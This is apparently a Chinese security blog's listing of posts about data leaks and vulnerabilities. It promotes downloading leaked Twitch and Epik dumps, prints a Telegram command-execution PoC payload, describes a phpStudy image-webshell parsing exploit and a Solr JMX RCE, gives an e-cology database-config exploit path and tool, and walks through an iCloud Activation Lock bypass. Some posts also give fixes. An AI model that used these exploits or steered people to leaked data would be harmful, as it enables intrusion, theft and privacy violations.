疑似 Twitch.tv 发生数据泄露 128GB 文件的种子在暗网泄露

重点:数据泄露.

疑似  Twitch.tv  的数据,根据种子名称看只是流露出的第一部分。各位自行下载斟酌。

下载方法在 之前的这篇文章说过了,不重复。

目录内容以及大小如下:


└── [5.1K]  twitch-leaks-part-one
    ├── [ 15K]  3rdparty.zip
    ├── [ 16M]  CPE-Chef.zip
...
标签: data-leak

Mrxn 发布于 2021-10-6 13:39

Anonymous曝光域名注册提供商Epik 180GB数据-附下载链接

点进来的人也是想下载,不明白的就看 Anonymous 原文:


*****************************************************************************************
________                                     __   .__
\_____  \  _____...

Mrxn 发布于 2021-9-17 13:17

HW情报之-多家安全厂商设备0day

接情报消息,深信服EDR(新)、奇治堡垒机、联软准入、天融信Top-app LB负载均衡及绿盟UTS等设备存在0day漏洞,请各企事业单位根据资产情况,梳理本单位存在以上设备的情况,加强监控,以避免遭受攻击

AF5D9F12-0C08-48B9-BCD6-E9C172BC8600.jpeg

恶意红队IP:http://d.zaix.ru/ntbv.txt


Mrxn 发布于 2020-9-11 04:38

【0day】phpStudy(小皮面板)最新版v8.1.0.7 nginx 解析漏洞

一、phpStudy(小皮面板)简介:
phpStudy v8.1.0.7.png

phpStudy国内12年老牌公益软件,集安全,高效,功能与一体,已获得全球用户认可安装,运维也高效。支持一键LAMP,LNMP,集群,监控,网站,FTP,数据库,JAVA等100多项服务器管理功能。

二、漏洞简介:

自从2019年phpStudy爆出的后门事件已经过去一段时间了,期间也没有爆出过什么漏洞,并且现在phpStudy(小皮面板)已经改版了,这次爆出的漏洞是nginx的解析漏洞,也就是存在已久的/xx.php解析漏洞

漏洞原理

1、由于错误配置(但是测试的时候是安装完后的默认配置,我在官方论坛也反馈了,他们还狡辩。。。)导致nginx把以.php结尾的文件交给fastcgi处理,为此可以构造http://www.xxx.com/test.gif/xx.php (任何服务器端不存在的php文件均可,比如a.php)

2、但是fastcgi在处理xx.php文件时发现文件并不存在,这时php.ini配置文件中cgi.fix_pathinfo=1 发挥作用,这项配置用于修复路径,如果当前路径不存在则采用上层路径。为此这里交由fastcgi处理的文件就变成了/test.gif。

3、 最重要的一点是php-fpm.conf中的security.limit_extensions配置项限制了fastcgi解析文件的类型(即指定什么类型的文件当做代码解析),此项设置为空的时候才允许fastcgi将.png等文件当做代码解析。
localhost_80.conf原始配置:

location ~ \.php(.*)$ {
            fastcgi_pass   127.0.0.1:9000;
            fastcgi_index  index.php;
            fastcgi_split_path_info  ^((?U).+\.php)(/?.+)$;
            fastcgi_param  SCRIPT_FILENAME  $document_root$fastcgi_script_name;
            fastcgi_param  PATH_INFO  $fastcgi_path_info;
            fastcgi_param  PATH_TRANSLATED  $document_root$fastcgi_path_info;
            include        fastcgi_params;
        }



三、漏洞复现:

测试环境:phpStudy(小皮面板)8.1.0.7 + 图片马(一定要注意不是那种copy的马子 有几率失败,可以下载这个马子测试)
复现如图:
bug_7.3.pngbug.png

执行系统命令:
exec.png
四、修复
php.ini 中 fix_pathinfo 禁用为0
cgi.fix_pathinfo=0

nginx.conf添加如下代码

location ~ \.php(.*)$ {
      if ( $fastcgi_script_name ~ \..*\/.*php ){
        return 403;
      }

            fastcgi_pass   127.0.0.1:9000;
            fastcgi_index  index.php;
            fastcgi_split_path_info  ^((?U).+\.php)(/?.+)$;
            fastcgi_param  SCRIPT_FILENAME  $document_root$fastcgi_script_name;
            fastcgi_param  PATH_INFO  $fastcgi_path_info;
            fastcgi_param  PATH_TRANSLATED  $document_root$fastcgi_path_info;
            include        fastcgi_params;
        }


请各位师傅下手轻点!注意保重!哈哈哈!


Mrxn 发布于 2020-9-2 14:47

【0day】宝塔面板phpmyadmin未授权访问(实际上是个逻辑错误)漏洞

宝塔刚刚发布紧急更新:

【紧急更新】宝塔Linux面板 - 8月23日更新 - 7.4.3正式版 

更新日志:
1、紧急修正一处安全风险
此次更新为紧急安全更新,请7.4.2的用户务必更新到最新版。

具体就是在宝塔7.4.2的Linux版本和windows面板 6.8安装了phpmyadmin的鉴权问题(其他版本不影响),导致只需要在phpmyadmin的端口(默认是888)加上/pma/即可访问:
宝塔面板phpmyadmin鉴权漏洞.png 
请大家赶紧自查!更新!
更新地址:https://www.bt.cn/bbs/thread-54644-1-1.html
详细的漏洞原因,在p牛的公众号有分析说明。

建议一般不用一直开着的服务最好用完即关,养成良好习惯。
再见

Mrxn 发布于 2020-8-23 12:00

Telegram(macOS v4.9.155353) 代码执行漏洞 PoC

Telegram 是啥不多说:看到了的赶紧更新吧。

详情看GitHub:https://github.com/Metnew/telegram-links-nsworkspace-open

给你发送一个超链接,包含恶意嵌套代码标签,导致命令执行。

POC 如下:

<html>

</head>
    <!--<meta property="og:url"   content="%A0file://google.com/bin/sh" /> Keybase-->
    <meta property="og:url"   content="file://google.com/bin/sh" />
    <meta property="og:type"  content="article" />
    <meta property="og:title" content="file://google.com/bin/sh ssh://google.com/x" />
    <meta property="og:description" content="ssh://google.com/x file://google.com/bin/sh? " />
</head>

</html>
标签: 漏洞

Mrxn 发布于 2019-12-9 13:49

最新iCloudBypass一键移除iphone 5s — iphone x 的ID锁

注:此方法适用于破解忘记ID密码的设备,支持iphone 5s — iphone x的全版本系统设备。

目前只能在Mac os系统环境下执行 (黑苹果可以而安装虚拟机则无法使用

适用设备:

iphone 5s — iphone x

所需工具:
checkra1in(越狱工具)
iCloudbypass(绕过iCloud的工具,无信号,可安装APP,当TOUCH用)


图文简要教程

使用checkra1in工具越狱:

手机连电脑,点start——next,start,跟着提示手动进DFU就好了

Snipaste_2019-11-19_22-38-02.png

下载及安装iCloudbypass
这是作者的github地址:

https://github.com/crazymind90/iCloudBypassCA

下载iCloudBypassCA.pkg文件,

如果不能安装,提示未知来源之类等,解决方法:登录管理员用户,从 Apple 菜单中选取“系统偏好设置”选取“安全性与隐私”打开,选择仍要打开,(勾选上任何来源,就不会显示通知了,但是不建议这么做!)不会设置的参考:https://support.apple.com/zh-cn/HT202491 ,还不会就不要折腾了。。。

安装后打开安装iCloudbypass后打开如图:
Snipaste_2019-11-19_22-38-48.png

打开终端:

Snipaste_2019-11-19_22-45-36.png

  1. 复制上图上的1所指小框框的内容,粘贴,回车

  2. 待跑完代码后,复制上图上的2所指小框框的内容,粘贴,回车

  3. 最后点击“Move iCloud to Trash”即可

Snipaste_2019-11-19_22-47-08.png

破解完成:
Snipaste_2019-11-19_22-47-50.png
 
 

作者的视频教程:

https://youtu.be/qSXzgrVhWgE

视频下载:
链接: https://pan.baidu.com/s/1BAzN0jw3iYFMpxHBSCIv5A 提取码: mrxn 

最后:

如果没有忘记ID密码的设备,不要自己加难度,强行试验,根本没有必要

此工具为第三方工具,理论上是有风险的,使用需谨慎。


标签: 苹果

Mrxn 发布于 2019-11-19 14:28

CVE-2019-12409/Apache Solr由于错误配置JMX RMI导致远程代码执行漏洞

0x1 背景

Solr是apache的顶级开源项目,它是使用java开发 ,基于lucene的全文检索服务器。

Solr仅新版本 8.1.1, 8.2.0受到该漏洞影响,Solr用户不应该把自身的 Solr 集群暴露于公网之中。

在Linux 下的环境下的Apache Solr 8.1.1和8.2.0版本中默认启用不安全配置(ENABLE_REMOTE_JMX_OPTS="true"),如果开启JMX监听服务,可能导致远程代码执行的风险,建议使用Apache Solr的用户尽快更新到无漏洞版本或

由于 Solr 新版默认启动时开启JMX服务,如果你的服务器是在公网上,请立即做好环境网络配置自查工作,或关闭JMX相关功能。

0x2 漏洞详情

Java ManagementExtensions(JMX)是一种Java技术,为管理和监视应用程序、系统对象、设备(如打印机)和面向服务的网络提供相应的工具。

JMX 作为 Java的一种Bean管理机制,如果JMX服务端口暴露,那么远程攻击者可以让该服务器远程加载恶意的Bean文件,随着Bean的滥用导致远程代码执行。

CVE-2019-12409漏洞:在Linux 下的环境下的Apache Solr 8.1.1和8.2.0版本存在默认不安全配置(ENABLE_REMOTE_JMX_OPTS="true"),通过该配置开启RMI服务(默认监听在TCP 18983端口)后,攻击者可利用网上公开的JMX漏洞利用工具进行远程代码执行(RCE)攻击,从而获取服务器权限。



    1.启动一个可以被用于远程类加载的 MLet web服务



    2.使用JMX服务使目标服务器远程加载恶意类



    3.调用恶意 Bean 实现代码执行



0x3 漏洞证明

CVE-2019-12409 shell.jpg

0x4 修复&缓解措施

临时缓解措施:

本次官方更新主要更新配置选项ENABLE_REMOTE_JMX_OPTS为false,因此在不影响业务系统正常运行的情况下,可以直接修改Apache Solr的bin目录里的solr.in.sh配置文件中的ENABLE_REMOTE_JMX_OPTS字段值为false,修改完配置需要重启服务才能生效。



附漏洞POC利用地址:

https://github.com/jas502n/CVE-2019-12409

参考地址:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12409
https://nosec.org/home/detail/2544.html
https://www.n0tr00t.com/2015/04/17/JMX-RMI-Exploit-Demo.html
https://github.com/mogwailabs/mjet

标签: 漏洞 Java rce

Mrxn 发布于 2019-11-19 14:03

泛微e-cology OA数据库配置信息泄漏漏洞

0x1漏洞描述

攻击者可通过该漏洞页面直接获取到数据库配置信息,攻击者可通过访问存在漏洞的页面并解密从而获取数据库配置信息,如攻击者可直接访问数据库,则可直接获取用户数据,由于泛微e-cology默认数据库大多为MSSQL数据库,结合XPCMDSHELL将可直接控制数据库服务器.

0x2影响范围

目前已知为8.100.0531,不排除其他版本,包括不限于EC7.0、EC8.0、EC9.0版

0x3漏洞复现

使用payload进行验证

http://www.target.com/path/DBconfigReader.jsp

直接访问该页面服务器将返回DES加密以后的乱码

访问数据库界面.png

需要使用DES算法结合硬编码的key进行解密,即可获得数据库连接信息。

DES解密获得数据库连接信息.png

也可以使用ecologyExp.jar http://www.target.com/path/DBconfigReader.jsp 直接一键操作,直接获取到明文数据库连接信息:

EXP直接获取数据库连接信息.png

0x4修复建议

  1. 建议限制访问数据库的IP;
  2. 及时安装补丁来修复漏洞,建议企业用户关注泛微官网发布的漏洞修复通知(https://www.weaver.com.cn);
  3. 如果存在此漏洞,修复漏洞后应及时修改数据库账号密码。

POC:https://github.com/Mr-xn/Penetration_Testing_POC/tree/master/tools/ecologyExp.jar

标签: 漏洞

Mrxn 发布于 2019-10-26 12:38

个人资料

    blogger

    Mrxn

    一个关注网络安全,热爱黑客技术的好青年!

搜索

最新评论